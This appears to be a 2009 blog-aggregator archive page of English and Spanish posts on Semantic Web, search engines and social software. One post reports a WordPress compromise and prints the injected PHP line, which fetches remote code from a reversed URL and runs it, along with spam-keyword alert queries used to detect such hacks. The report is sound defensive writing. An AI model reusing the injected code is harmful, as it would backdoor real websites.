Archive

Archive for May, 2009

PwC Technology Forecast: Spring 09

May 29th, 2009

Click here to find an excellent, professional report from PriceWaterhouseCoopers (the PWC Quarterly Technology Forecast) on the impact of Semantic Web and Linked Data – primarily with an enterprise vs. web focus.

It's well worth a read and sharing with others.

English, Official Blog

Price Waterhouse Coopers bullish on the Semantic Web

May 29th, 2009

Price Waterhouse Coopers is one of the largest “professional services” organization and has always been strong on technology consulting and advice. The Spring issue of their quarterly Technology Forecast journal focuses on the Semantic Web. This is from the table of contents

pwc-tech-forecast-spring-2009

  • 04 Spinning a data Web. Semantic Web technologies could revolutionize enterprise decision making and information sharing. Here’s why.
  • 20 Making Semantic Web connections. Linked Data technology can change the business of enterprise data management.
  • 16 Traversing the Giant Global Graph. Tom Scott of BBC Earth describes how everyone benefits from interoperable data.
  • 28 From folksonomies to ontologies. Uche Ogbuji of Zepheira discusses how early adopters are introducing Semantic Web to the enterprise.
  • 40 How the Semantic Web might improve cancer treatment. M. D. Anderson’s Lynn Vogel explores new techniques for combining clinical and research data.
  • 46 Semantic technologies at the ecosystem level. Frank Chum of Chevron talks about the need for shared ontologies in the oil and gas industry.

You can download the free 58 report here. You can also read a note on the issue in ReadWriteWeb, which focuses on linked data and interoperability.

“A new PricewaterhouseCoopersTechnology report explains how the Semantic Web and Linked Data can help enterprises manage their large scale data better. The PwC Center for Technology and Innovation team spent several months researching and analyzing the problem of data silos in enterprises - and what solutions are being developed to help with that problem. The answer, according to PwC, is Semantic Web techniques. PwC believes that the Semantic Web offers a practical way to address the problem of large-scale data integration. … “

(Spotted on publi-lod@w3.org)

English

Microsoft dice “Bing”

May 29th, 2009
Hablamos hace unas semanas de Kumo, el nuevo buscador semántico de Microsoft. Al parecer el nombre no ha acabado de convencer y la aplicación se presentará el 3 de Junio como "Bing" (en Europa con funcionalidades limitadas).

Microsoft ha publicado horas los detalles y algunas fotos del motor, y un vídeo explicativo. El motor se basa en un nuevo principio: ofrecer información de utilidad inmediata para las necesidades prácticas: según los términos introducidos por el usuario Bing "entiende" el contexto de búsqueda y proporciona información relacionada. Por ejemplo? Introducimos el nombre de una localidad turística Bing nos pide si queremos ver fotos u obtener información sobre hoteles. Además, en contraste con la gráfica escueta de Google, Bing tiene varias secciones (Salud, Turismo, Deporte..) en las cuales el usuario puede navegar a la búsqueda de la información que necesita.
La batalla de los buscadores se mueve hacía las búsquedas inteligentes. No nos queda que esperar al día del lanzamiento y ver como reaccionan los internáutas más expertos y el gran público.
Reblog this post [with Zemanta]

Bing, Google, Kumo, Microsoft, Spanish, Web Search Engine

BlogTalk 2009 (6th International Social Software Conference) - Call for Proposals - September 1st and 2nd - Jeju, Korea

May 29th, 2009

20090529a

BlogTalk 2009
The 6th International Conf. on Social Software
September 1st and 2nd, 2009
Jeju Island, Korea

Overview

Following the international success of the last five BlogTalk events, the next BlogTalk - to be held in Jeju Island, Korea on September 1st and 2nd, 2009 - is continuing with its focus on social software, while remaining committed to the diverse cultures, practices and tools of our emerging networked society. The conference (which this year will be co-located with Lift Asia 09) is designed to maintain a sustainable dialog between developers, innovative academics and scholars who study social software and social media, practitioners and administrators in corporate and educational settings, and other general members of the social software and social media communities.

We invite you to submit a proposal for presentation at the BlogTalk 2009 conference. Possible areas include, but are not limited to:

  • Forms and consequences of emerging social software practices
  • Social software in enterprise and educational environments
  • The political impact of social software and social media
  • Applications, prototypes, concepts and standards

Participants and proposal categories

Due to the interdisciplinary nature of the conference, audiences will come from different fields of practice and will have different professional backgrounds. We strongly encourage proposals to bridge these cultural differences and to be understandable for all groups alike. Along those lines, we will offer three different submission categories:

  • Academic
  • Developer
  • Practitioner

For academics, BlogTalk is an ideal conference for presenting and exchanging research work from current and future social software projects at an international level. For developers, the conference is a great opportunity to fly ideas, visions and prototypes in front of a distinguished audience of peers, to discuss, to link-up and to learn (developers may choose to give a practical demonstration rather than a formal presentation if they so wish). For practitioners, this is a venue to discuss use cases for social software and social media, and to report on any results you may have with like-minded individuals.

Submitting your proposals

You must submit a one-page abstract of the work you intend to present for review purposes (not to exceed 600 words). Please upload your submission along with some personal information using the EasyChair conference area for BlogTalk 2009. You will receive a confirmation of the arrival of your submission immediately. The submission deadline is June 27th, 2009.

Following notification of acceptance, you will be invited to submit a short or long paper (four or eight pages respectively) for the conference proceedings. BlogTalk is a peer-reviewed conference.

Timeline and important dates

  • One-page abstract submission deadline: June 27th, 2009
  • Notification of acceptance or rejection: July 13th, 2009
  • Full paper submission deadline: August 27th, 2009

(Due to the tight schedule we expect that there will be no deadline extension. As with previous BlogTalk conferences, we will work hard to endow a fund for supporting travel costs. As soon as we review all of the papers we will be able to announce more details.)

Topics

Application Portability
Bookmarking
Business
Categorisation
Collaboration
Content Sharing
Data Acquisition
Data Mining
Data Portability
Digital Rights
Education
Enterprise
Ethnography
Folksonomies and Tagging
Human Computer Interaction
Identity
Microblogging
Mobile
Multimedia
Podcasting
Politics
Portals
Psychology
Recommender Systems
RSS and Syndication
Search
Semantic Web
Social Media
Social Networks
Social Software
Transparency and Openness
Trend Analysis
Trust and Reputation
Virtual Worlds
Web 2.0
Weblogs
Wikis
Reblog this post [with Zemanta]

BlogTalk, Blogs, Boards, Business, Call For Papers, China, Data Portability, EasyChair, Education, English, FOAF, Japan, Korea, Management, Management Information Systems, Management Science, Microblogs, Mobiles, Podcasts, SIOC, Semantic Web, Social, Web, Wikis, internet, rss, social media, social networks, social software, web 2.0

Baltimore MD BarCamp on 20 June 2009

May 28th, 2009

There will be a bar camp in Baltimore on Saturday, 20 June 2009 at the University of Baltimore. Bar camps are unconferences — ‘open, participatory workshop-events, whose content is provided by participants”.

Here’s how the Baltimore Sun described it:

“Organizers have scheduled the event on June 20 at the university’s Thumel Business Center. Following the BarCamp format, the event will have no pre-set agenda. Instead, attendees who show up that morning will determine the day’s program by suggesting and voting on topics. Such events usually attract artists, designers and people who work in technology and the Web. BarCamps got their start in California four years ago, and are now held all over the world. For more information, visit twitter.com/barcampbmore, or contact Mike Subelsky, an organizer, at mike@subelsky.com. Additional information about the BarCamp model can be found at www.barcamp.org.

At last year’s Baltimore BarCamp was focused on social media — see the blog post by UMBC ebiquity alumnus Dr. Harry Chen.

English

Google Wave as a new communication model

May 28th, 2009

Google wave looks interesting. Google describes it as “a new tool for communication and collaboration on the web” and it’s a funny mix of email, instant messaging, wikis, and Facebook wall interactions. Or maybe IRC for the new century. This is from a post, Went Walkabout. Brought back Google Wave, on the Google blog.

“A “wave” is equal parts conversation and document, where people can communicate and work together with richly formatted text, photos, videos, maps, and more. Here’s how it works: In Google Wave you create a wave and add people to it. Everyone on your wave can use richly formatted text, photos, gadgets, and even feeds from other sources on the web. They can insert a reply or edit the wave directly. It’s concurrent rich-text editing, where you see on your screen nearly instantly what your fellow collaborators are typing in your wave. That means Google Wave is just as well suited for quick messages as for persistent content — it allows for both collaboration and communication. You can also use “playback” to rewind the wave and see how it evolved.”

Google Wave is not available yet, but you can sign up to be notified when it’s launched.

Here’s a random thought. Our models for communication in multiagent systems (e.g., KQML and FIPA) were informed by if not based on email and, to a lesser degree, IM. If Wave is a useful new communication model for humans, does it have a counterpart for software agents? If so, I suspect that ideas from the Semantic Web will be useful to provide a “rich content” for agents.

For more views, see posts by o’reilly, techcrunch, BusinessWeek and Gabor Cselle.

English

Dell Swarm: social network buying groups

May 27th, 2009

Dell is exploiting social networks in a new marketing scheme being tried out in Singapore. If you agree to buy a laptop on Dell Swarm, the discounted price drops as others join your “swarm” and also buy. Here’s how Dell describes it:

  • Start by picking the laptop you would like to purchase. Be the first buyer to join a Swarm and you’ll enjoy a price lower than Dell.com’s best discounted price (after cash rebates).
  • Join a Swarm after, and you’ll enjoy a new, lower price - as will all previous buyers. To see the range of prices, simply slide the Swarm price bar downwards.
  • Once the swarms closes - which is when the limit of 15 buyers or 72 hours is reached, whichever is the earlier, the price is then finalised. This final, lowest price now becomes everyone’s purchase price – including yours!
  • To get the maximum discount, grow the Swarm by Sharing with your friends. You can share via Twitter Or post a note on your Facebook® profile and tell all of your friends Point others towards your Swarm using Digg, del.icio.us and other tools. Or simply send your friends an email directly!
  • Not ready to buy yet? You can also choose to Follow the Swarm. You’ll then receive updates via email. As well as through free SMS alerts.

We’ve seen this idea on the Web before (e.g., see Group Buying), but it is usually framed as a tool by and for consumers rather than a marketing strategy employed by vendors. This could be a big win for Dell. If it is, others will follow. The penetration of online social networking systems is much greater now and finding ways to exploit them for marketing is irresistible.

English

My Twitter Wordle

May 27th, 2009

Here’s a Twitter “Wordle” via my TweetStats tag cloud page:

20090527a

Also, my usage stats show a nice growth over the past two years:

20090527b

English, Microblogs

goo go opensocial

May 26th, 2009

The Japanese portal / search engine goo, have gone live with their Shindig-based OpenSocial container. See example user page, goo labs site, developer’s kitchen and documentation (in Japanese). See also announcement from Eiji Kitamura on the shindig (Apache opensocial) list.

English, Japan and Japanese, OpenSocial, SocialWeb, Technology, gadgets, ggg, go, widgets

Search: Statistics vs. Semantics. And so the Battle Begins…

May 26th, 2009


The Semantic Web gang gathered this month to discuss the recent launch of Wolfram Alpha and the endorsement of RDFa by Google. My impression of Wolfram, to talk about it, is that it fills a clear white space in the search engine arena, a space I would divide up into 2 sub-fields: * FIND * DISCOVER (more on the post)

English, Google, Powerset, RDFa, Semantic Web, Web Search Engine, Wikipedia, search, wolfram alpha

Probando el futuro (más absurdo nos pareció twitter…)

May 25th, 2009

Seguimos en la onda de la Web 3.0, la tercera década de la web. Y hoy nos dejan en RWW, 2009 varios datos y alguna que otra curiosidad para geeks (yo pienso comprarlo ;) ), que a pesar de que pueda parecernos algo artificiosa ahora, creo que puede significar el primero de una serie de pasos que nos encaminan de forma irremediable a esa web de las cosas que aún vemos sólo en los vídeos promocionales o documentales de productos o universidades.

Pero quería hablaros primero de la real time web, el Stream ejemplificado en una aplicación aún no disponible, pero que puede superar la no sincronicidad exacta de Twitter. Su nombre es Collecta y promete ser el motor de búsqueda en tiempo real más potente de la web.

Tenéis un ejemplo en la monitorización de todas las referencias en  Twitter, WordPress, Flickr a Obama. Esperaremos su lanzamiento público pero promete como herramienta a integrar en cualquier entorno personal de información, investigación o aprendizaje.

Pero lo que más me sorprendía, por lo bien que ejemplifica el concepto de “embodiment”,  la web de las cosas, como por su potencial si escala la parcela de la web con la que es compatible, por lo que puede permitirnos en cuanto a creatividad es Mir:ror:

Se trata de un dispositivo (en forma de espejo, de “conejito” (el “Nabaztag”) conectado a la red y que que permite crear acciones en nuestros equipos, mediante etiquetas (RFID) pegadas a objetos de uso cotidiano (libros, tazas, llaves, etc…).

Parece algo insignificante en el vídeo que nos muestran, tan absurdo como nos lo pareció Twitter en su momento, pero igualmente capaz de ser apropiado de formas nuevas, creativas por parte de los usuarios.

Es muy popular en Francia, cuesta sólo 49 dólares y puede hacer algunas cosas ya pensadas ( leer libros, leer feeds en voz alta, enviar mensajes a nuestros contactos, leernos el correo, etc…) o o aún por imaginar. Creo que tiene potencial en términos de accesibilidad,  incluso en aprendizaje, como una nueva forma de “literacy” añadida a los múltiples formatos que ya tenemos a nuestra disposición.

Os dejo algunos vídeos. En este caso, cuando hablamos de cosas tan poco familiares, tan “frikis”  aún, nos serán reveladores…:

Compártelo: bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark

2009, Aprendizaje, Evolución, Net-art, curiosidades en la red, Planeta educativo, Spanish, Vídeos, Web 3.0, Web en tiempo real, buscadores alternativos, curiosidades, filtrado de contenidos, futuro web, innovación, internet de las cosas, multimedia, real-time web, rfid, twitter, video-documentales, web de las cosas, web3.0

Vídeo: Ego, responsabilidad y capitalismo del conocimiento

May 24th, 2009

Aunque somos vanos y nuestra vida es un ridículo instante en la longitud del Universo, podemos aspirar a la eternidad a través de lo que transmitimos a las siguientes generaciones”

He dudado sobre si dejarlo en Tumblr, pero una visión más profunda, además de algunas lecturas y sinergias  lo trae aquí:

Se trata de un vídeo con múltiples ideas nuevas y reformuladas sobre capitalismo (capitalismo del conocimiento), sociedad del conocimiento (en la que este deja de tener valor como tal…),  “ego management” en lugar de gestión de recursos humanos y cambios necesarios en nuestra responsabilidad y en las organizaciones.

De la gestión individualista del talento a la gestión colectiva de la sabiduría…

De acuerdo en todo excepto en la idea de que el mero hecho de aportar blogs y redes sociales a la organización pueda cambiarla. Creo que la clave está en la formación, en la sensibilización y no como tarea de consultoría sinó como nuevo servicio, semi-externalizado y permanente durante algún tiempo en las organizaciones.

Un verdadero placer, conocer esta tarde de domingo a Hiroshi Tasaka y su  SophiaBank, una sociedad prácticamente sin ánimo de lucro, dedicada a proporcionar a las empresas el capital intelectual y las conexiones necesarias para desarrollarse en un entorno de innovación constante.

¿Podríamos aprender los consultores artesanos de ella y del conocimiento tácito, no tangible, sentimiento, imaginación, creatividad que define como sus valores?

Me ha recordado, por otra parte, una sensación que quería trasmitiros:  He visto ya unas cuantas veces el vídeo se Simón Hergueta, El futuro de Internet. Ayer, quizás por el efecto mágico del excelente grupo con el que lo compartía en Innocamp, me daba cuenta de un detalle que se me escapaba: El ser humano posee 1.000.000.000.000.000 de conexiones sinápticas en su cerebro, algo a lo que internet sólo llegaría en  2019.

El potencial de nuestra inteligencia es excepcional para cambiar el mundo. O como diría Tasaka en esta lectura complementaria ideal, Eco es ego, salgamos ya de la prehistoria.

(Gracias, Olga, por la sugerencia en delicious)

Relacionados:

Compártelo: bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark

2009, Activismo, Economía 2.0, Evolución, ICM09, Knowledge Management, Nuevas Tecnologías-Internet, Planeta educativo, Spanish, Vídeos, autoayuda, blogging, capitalismo, cibercultura, cognitivismo, conocimiento, cultura 2.0, cultura general, derechos humanos, diversidad, e-learning2.0, empresa 2.0, filosofía, futurismo, futuro, futuro internet, hiroshi tasaka, innocamp, innovación, inteligencia colectiva, km 2.0, multimedia, responsabilidad, sabiduría multitudes, sharismo, singularidad, software, video-activismo, video-documentales, web 2.0, web3.0, zeitgeist evolución

Launch of the Toronto Semantic Group and First Meeting

May 24th, 2009


I am glad to announce the launch of the Toronto Semantic Meetup Group, at last! Our first meetup will take place this Wednesday at 6PM at Xtreme Labs. After an introduction to the group by William Mougayar of Eqentia, who started the group, I will be giving a presentation "Semantic Web 101" and discuss ways start-ups can succeed in the space. William and I will also report on the recent Web 3.0 conference we both went to. There will be an extensive Q&A and networking opportunity. Please visit the Toronto Semantic Group page on Meetup to register.

Canada, Data Structuring, English, Knowledge Management, Linked Data, Semantic Web, Semantic Web group, Text Analysis, Toronto, Web 3.0, Web 3.0 Conference, semantic advertising

UCSD Data Mining Contest

May 24th, 2009

For the past five years UCSD has run a student datamining contest sponsored by FICO, the decision management firm famous for developing the FICO credit score. The details of the 2009 datamining contest were released last week with results due on 15 July.

“This year’s contest consists of two classification tasks based on e-commerce transaction anomaly data. The first task is to maximize accuracy of binary classification on a test data set, given a fully labeled training data set. The performance metric is the lift at 20% review rate. The second task is similar to task 1, but provides a couple of additional fields that have potential predictive information.”

The contest is open to all full-time undergraduate and graduate students as well as postdocs. A total of $8,000 in prize money will be awarded in various categories.

(spotted on Hacker News)

English

The Future of the Web: BBC Interview

May 22nd, 2009
The BBC World Service's Business Daily show interviewed the CTO of Xerox and me, about the future of the Web, printing, newspapers, search, personalization, the real-time Web. Listen to the audio...

English, Nova Spivack, Productivity, Technology, Web 3.0, Web/Tech, Wild Speculation, future, future of the web, realtime web, search, software, streaming, the stream, web 2.0, web future

La web semántica, con Kumo y Google, un poco más cerca

May 22nd, 2009

Trasladaba la información hace un tiempo, entrevistada para una revista acerca del desarrollo de la semweb: “queda muy poco para que podamos considerarla una realidad”

Pues bien, no con Wolfram Alpha, que ya veíamos cómo no parece trabajar con algoritmos semánticos, sinó a través de los grandes de la web: Microsoft, con un Kumo inminente y Google con la intención de no  quedarse atrás:

Les decía entonces:

“Powerset será el germen del nuevo buscador semántico de Microsoft y su éxito determinará el tiempo de implantación de la Web 3.0. “La Web semántica es el futuro y será una realidad a medio plazo. Llegará antes si Microsoft mantiene su apuesta por lanzar un buscador semántico basado en las normas de W3C, porque en cuanto Google tenga una dura competencia incluirá la normativa semántica. Hace falta el empuje de una empresa con la fuerza de Microsoft para lograrlo”

Está teniendo lugar estos días Innovacamp Mediterránea. (#ICM09). Mi intervención, mañana a las 17:20, tratará sobre la web 3.0 (aquí la presentación básica: la tercera década de la web), así que trasladaré allí algunos de los siguientes argumentos:

“Será complejo y caro convertir los algoritmos matemáticos base de toda la información de Internet a lenguaje semántico. Hay trillones de páginas en Internet y los expertos evalúan que en su traducción se podría llegar a cuadruplicar el tiempo necesario para hacer una web. Los primeros pasos se dieron hace 5 años, y su crecimiento es lento.”

“La tecnología semántica es, sobre todo, utilizada por pequeñas empresas que hacen desarrollos puntuales para organismos y grandes firmas. Suelen centrarse en la atención de consultas públicas, como los muñecos robots de atención al cliente de la web de Grupo Vodafone o el servicio de ayuda para buscar información de Tata.  Buscadores como Yahoo y Mozilla o Wikipedia incorporan, poco a poco, tecnología semántica.”

semantica broma

Google ha decidido desmarcarse de esta evolución y no se pronuncia sobre la Web semántica, “porque no es un tema que tenga que ver con nosotros”, asegura un portavoz. El buscador, que tiene más del 73% del mercado mundial (corrijo el dato que la revista publica), utiliza tecnología semántica en una pequeña parte de la realización de sus búsquedas, pero no es la normalizada por W3C. Oficialmente no piensa en una evolución hacia la Web semántica”

“Así, el mismo Berners-Lee ha dicho que Google podría ser reemplazado como líder supremo de Internet por otra compañía que utilice la Web semántica, a pesar de haber desarrollado un método muy eficaz de búsqueda que le ha posicionado como líder:

La pelota está ahora en el tejado de Microsoft. El gigante de software para ordenadores se prepara para librar la batalla por Internet, imprescindible para mantener su dimensión empresarial a largo plazo. En unos años, los ingresos de las empresas de TI y telecomunicaciones procederán de los servicios y la publicidad movida en Internet, porque todos los terminales serán meras ventanas asomadas a la Red. Y quien domine las búsquedas dominará el mercado publicitario, porque el 54% de las compras se inician en buscadores, frente a un 30% que van directamente a la página del servicio o la tienda. El éxito del navegador de Microsoft, Explorer, es incontestable y ronda la mitad del mercado en las economías occidentales, pero su buscador LiveSearch no despega y apenas alcanza el 9% de las búsquedas estadounidenses, porcentaje que baja en otros países.

En julio pagó unos 100 millones de dólares por Powerset, buscador semántico base en Wikipedia. “Microsoft cree en la búsqueda semántica y vimos que la tecnología de Powerset era muy buena y desarrollada de acuerdo a la normativa de W3C. Apostamos por la Web semántica, y estamos viendo cómo exportar esta tecnología a  la www (corrijo tb)”.

En fin…que Kumo, el nombre previsto para el lanzamiento, saldrá en pocas semanas al mercado. Lo confirmo leyendo un artículo en La Cofa:

“Parece que Google se ha dado cuenta que la competencia apremia…

Como en otras ocasiones Google no quiere perder su posición innovadora y según ha indicado apuesta fuerte por las soluciones semánticas. Así este martes acaba de anunciar varias nuevas funcionalidades como:

  • Rich Snippets: Permite obtener un resumen de información sobre un término de búsqueda para que el usuario pueda de un vistazo hacerse una idea general. Por ejemplo si un usario teclea el nombre de un restaurante, el buscador podrá mostrar opiniones de usuarios, clasificaciones… Para ello se basa en la utilización de RDFa y Microformatos.
  • Google Squared: Que permite (de forma similar a Wolfram Alpha, añado) obtener de las consultas información estructurada y presentarla en formato tabla de datos.
  • Google Search Options: Incorpora opciones de búsqueda que en algunos casos parecen tener un fundamento semántico como la representación gráfica de términos semánticos, identificar si una entrada es una opinión, y hasta destacar el texto que recoge el sentimiento del autor.”

Kumo, Kumo, Kumo…(Actualización 25/5: Bing, Bing, Bing….;)) creo que vamos a quedar tan saturados del término como del de Wolfram Alpha en breve…. para que luego digan que el de “web 2.0″ cansa ;)

Fuente imagen.

Artículos en El caparazón sobre web semántica

Compártelo: bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark

2009, Evolución, Google, ICM09, Kumo, Microsoft, Planeta educativo, Powerset, Spanish, TRABAJOS DESTACADOS, Web 3.0, Web Semántica, buscadores, buscadores alternativos, colaboraciones, evolución web, fundamentos, futurismo, herramientas semánticas, innovacamp, innovación, web3.0, wolfram alpha, zeitgeist evolución

Is the Semantic Web taking off?

May 22nd, 2009

During a lot of time there has been a lot of buzz about the semantic web. In fact, always appears among the most important technological trends in the medium term in the pools of relevant technology consulting firms. But its market adoption has always been postponed either because low maturity level of technology or lack of market interest.

In recent days it seems that things start to change and every day more service launchings include some kind of semantic technologies foundations. But announcements showed by Google during the “Searchology” event, which took place at the premises of this company in Mountain View (California), represent a major milestone.
It seems that Google has realized that competition is tight, with more new competitors than a year ago, i.e. Wolfram Alpha that claims to answer complex questions formulated in natural language. Microsoft is also expected to launch a new semantic search engine in the coming weeks, Kumo, based on the technology acquired when took control of Hakia a year ago. In other cases such as Yahoo, its browser SearchMonkey has been using semantic technologies for over a year.
As in other occasions Google does not want to lose its position as innovator and has point out a strong bet for semantic solutions, announcing several new features:
• Rich Snippets: It provides a summary of information based on a search term so that the user can get at a glance a general idea of the information. For example, if a user types the name of a restaurant, the browser may display user opinions, ratings… This feature is based on the use of RDFa and Microformats.
• Google Squared: It allows to obtain structured data from a query and to present that information in a data table.
• Google Search Options: It is a group of search options that in some cases appear to be based on a semantic layer. For example it is possible to identify if an entry is an opinion and even to highlight the text that reflects the sentiment of the author, or the representation of related terms of a query.
To introduce a technology into the market there are two necessary conditions: an adequate level of maturity, and an interest from an economic point of view for the companies to use it. The first condition is somewhat clear but is the second point where doubts arise. Some people aim at the improvement in the advertising effectiveness when the meaning of the searches is understood as one of the keys to overcome this barrier.
While many search engines have begun to utilize this kind of technology, the bet of Google mark a fundamental difference, because this search engine accounts for 73% market share, and it is a reference company in the sector.
It seems we are entering another completely different phase for search engines, and in five years probable we will remember today as a “that time when the searches were textual…”

English, Spanish, Trends

Rick Jelliffe on XML Schema

May 22nd, 2009

From the TAG list:

XML Schemas is like using a Swiss Army knife to cook with. Most Asian kitchens get by with a handful of simple tools: chopsticks, hatchet, a good knife, perhaps even a spoon. But the logic of  the XSD WG is “Oh, the French need to make quenelles, we must have a quenelling spoon as a grave matter of Internationalization because it is not our business to judge what people need… as long it is more stuff.”    So XSD 1.1 welds another Swiss Army knife onto the existing one, so that no kitchen should suffer without a quenelling spoon.

See also earlier comments on the Schema Experience Workshop from W3C.

So tool-makers blame users for generating non-standard schemas, and users blame the spec for being to difficult to know whether their schemas are standard or not, and spec makers blame tool makers for not implementing the spec properly. Who will free us from this cycle of sin and death?

[...] The only way that XML Schemas can be refactored is with a different core XML Schemas working group. My current expectation is that a lot of nothing will happen until XQuery/XSLT2 becomes seen as a more central technology than XML Schemas; the goal will then be how to support XQuery most minimally.

XSD doesn’t trouble me as much as it troubles Rick, but I have long sympathised with the approach he advocates with Schematron. The RDF equivalent of this is the approach Libby and I called “Schemarama”, expressing constraints against RDF instance data using queries. See original 2001 demo using SquishQL, and a later reworking by Alistair Miles using SPARQL (currently offline?). Recent work from the OWL experts at Clark & Parsia (blog post; another blog post) is heading in the same direction. I wonder whether Rick’s observation about XML applies to RDF too, and that at some point, SPARQL querying facilities will be so ubiquitous in RDF tools that it becomes second nature to apply it to data checking tasks too…?

Update: see also SpinRDF from Holger & co. at Top Quadrant

English, RDF, SPARQL, Technology, coding, schemas, schematron, xsd

Destripando Wolfram Alpha

May 21st, 2009

Hace unos días se presentó Wolfram Alpha. Para el que todavía no lo sepa se trata de un "computational knowledge engine" que en castellano viene a ser "motor de computación de conocimiento". Esto quiere decir que es un buscador de información, una máquina que opera con muchísima información para poder ofrecer respuestas. Informan con cierto secretismo que utilizan "un nuevo tipo de computación basada en el conocimiento". El proyecto es muy ambicioso y tienen la bondadosa intención de...

"Our goal is to build on the achievements of science and other systematizations of knowledge to provide a single source that can be relied on by everyone for definitive answers to factual queries."

conseguir ser la gran fuente de información que sea capaz de mostrar los logros de la ciencia en base a las  preguntas de los usuarios.  "Recabar toda la información objetiva, método o algoritmo y hacerla computable".

Internamente está basado en Mathematica, software longevo (más de 20 años) de desarrollo matemático bastante conocido en el ámbito académico y cuando se realizó la release el servidor de clustering contaba con más de 10.000cores. Toda una start-up.

Desde el punto de vista de la web semántica suena muy interesante y hasta cierto punto llama la atención que en este mundillo no se haya comentado nada hasta hace unos días. Las reacciones no se han dejado esperar, hay quien ve una lucha entre el "mundo abierto" que promulga la Web Semántica y este tipo de soluciones basadas en modelos cerrados y alejados de los estándares, ontologías, descripciones de vocabularios. 

Tras someterle a una batería de pruebas [1], llegamos a varias conclusiones interesantes.
  • Wolfram Alpha responde preguntas con respuestas únicas y concretas. Primer distanciamiento con Google.
  • La respuesta contiene información en sí misma (respuestas concretas, gráficas, etc...) y no páginas con información relativa. Por lo tanto, Wolfram Alpha no es un buscador tradicional, del estilo Google o yahoo!. 
  • Entiende lenguaje natural. Este aspecto resulta muy llamativo, pero no han sido los primeros en llevar a cabo una idea así, de hecho recuerdo que iSOCO llevo a cabo una herramienta que entendía el languaje natural hace algunos años.  Aquí cabe una matización: qué entienda lenguaje natural no significa que sólo entienda lenguaje natural. Esta reflexión es muy importante desde el punto de vista de que no han cometido el error de exigir un cambio en el paradigma de búsqueda por todos estandarizado. Se ve claro con el ejemplo 1 y 2 de la batería de pruebas. 
  • La información viene supervisada por un "comité de sabios", esto nos valdría para decir que no es una aplicación 2.0.  En Wolfram Alpha la colaboración del usuario se límita a un feedback a modo de comentario sobre el resultado de la entrada. Han vendido esta obligada supervisión como una clave de su excelencia, exactamente la misma excelencia que busca la wikipedia con la solución contraria. ¡Qué curioso!
  • Ofrecen un API bastante interesante aunque todavía bastante primigenio. El API es unidireccional, sólo se envían datos. Ofrece dos grandes líneas de trabajo: la función Query que responde tus preguntas y la funciónValidateQuery que estudia la validez de tus preguntas. Afortunadamente comentan que pronto ofrecerán un API más potente, más de "bajo nivel". 
  • Está sólo en inglés. La salida ha sido en inglés y no he leído nada al respecto de internacionarlo, supongo que es demasiado pronto todavía, aunque tras ver la respuesta que da a la pregunta número 8 ya no me extraña nada en este mundo. No me quiero ni imaginar cómo van a hacer para internacionalizar el sistema de reconocimiento del lenguaje natural. Todo un reto increíble. 
  • No es semántico. Aunque muchas páginas digan que sí lo es. Basta el ejemplo 7 para demostrar esta afirmación. La web semántica se basa en que la información esté descentralizada y compartida en la nube, al alcance de todos. Wolfram alpha es simplemente lo contrario, la información tiene un ámbito cerrado.
    Si alguno tiene dudas, utilizando psicología inversa, podríamos afirmar que si fueran semántico, hubieran  habilitado en su api o en su versión de pago algún formato de intercambio semántico.  Se han limitado a PDF, hojas de cálculo, XML, 3D modeling, TeX... Está claro que intercambiar información en XML es una aproximación que posibilita acceder a esa información de manera semántica de forma quasi-inmediata, pero aun así, la respuesta es: Wolfram Alpha no es semántico. Toda una lástima, por cierto.
    Espero que la gente de LOD (Linking Open Data) se pongan manos a la obras a crear sinergias con el señor Wolfram.
    Voy a ver si hablo con un antiguo profesor, podría plantearse un buen proyecto final de carrera en esta dirección... ¿algún voluntario?
  • Ámbito académico y educacional. Exactamente lo que no tiene la Wikipedia. La rigurosidad de su política de actualización de información y la calidad de las respuestas dentro del ámbito científico hacen de él un producto excepcional, sin embargo, me gustaría saber qué frecuencia de actualización van a llevar, ahí va a ser difícil competir con la wikipedia. 
    Espero que los responsables en educación y la comunidad cientifica tomen definitivamente nota.


¿Cuándo veremos páginas que utilicen este conjunto de datos de manera útil para el usuario final?


[1] Batería 

1. Big City

http://www19.wolframalpha.com/input/?i=big+city

2. What is the biggest city?

http://www04.wolframalpha.com/input/?i=What+is+the+biggest+city%3F

3. A room of one's own (libro de Virginia Woolf)

http://www01.wolframalpha.com/input/?i=A+room+of+one's+own

4. Cuando libros ha escrito Michael Crichton?

http://www04.wolframalpha.com/input/?i=How+many+books+did+Michael+Crichton+write%3F

5. Michael Crichton

http://www04.wolframalpha.com/input/?i=Michael+Crichton

6. What is Nato?

http://www04.wolframalpha.com/input/?i=What+is+NATO%3F

7. What is RDF?

http://www19.wolframalpha.com/input/?i=what+is+rdf%3F

8.  Blowind in the wind

http://www96.wolframalpha.com/input/?i=How+many+roads+must+a+man+walk+down+before+you+can+call+him+a+man%3F


David Canós

Spanish, Web Semántica, wolfram alpha

Monitor Twitter for news of the zombie apocalypse

May 21st, 2009

Who says that Twitter is not useful? The Boston Police Department is on record as promising to use twitter to alert us if and when the zombie apocalypse starts. You might want to check for #zombie before you go out the door in the morning.

English

Ebiquity Google alert tripwires triggered

May 21st, 2009

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old Wordpress installation was exploited to add the following code to the top of our blog’s main page.

< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like http://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest Wordpress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)

We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
  • viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.


Google alert for a hacked website

The results of this Google search reveal many compromised blogs from the .edu domain.

English

Stream, fundamental en la web 3.0 y la próxima reconquista de Google

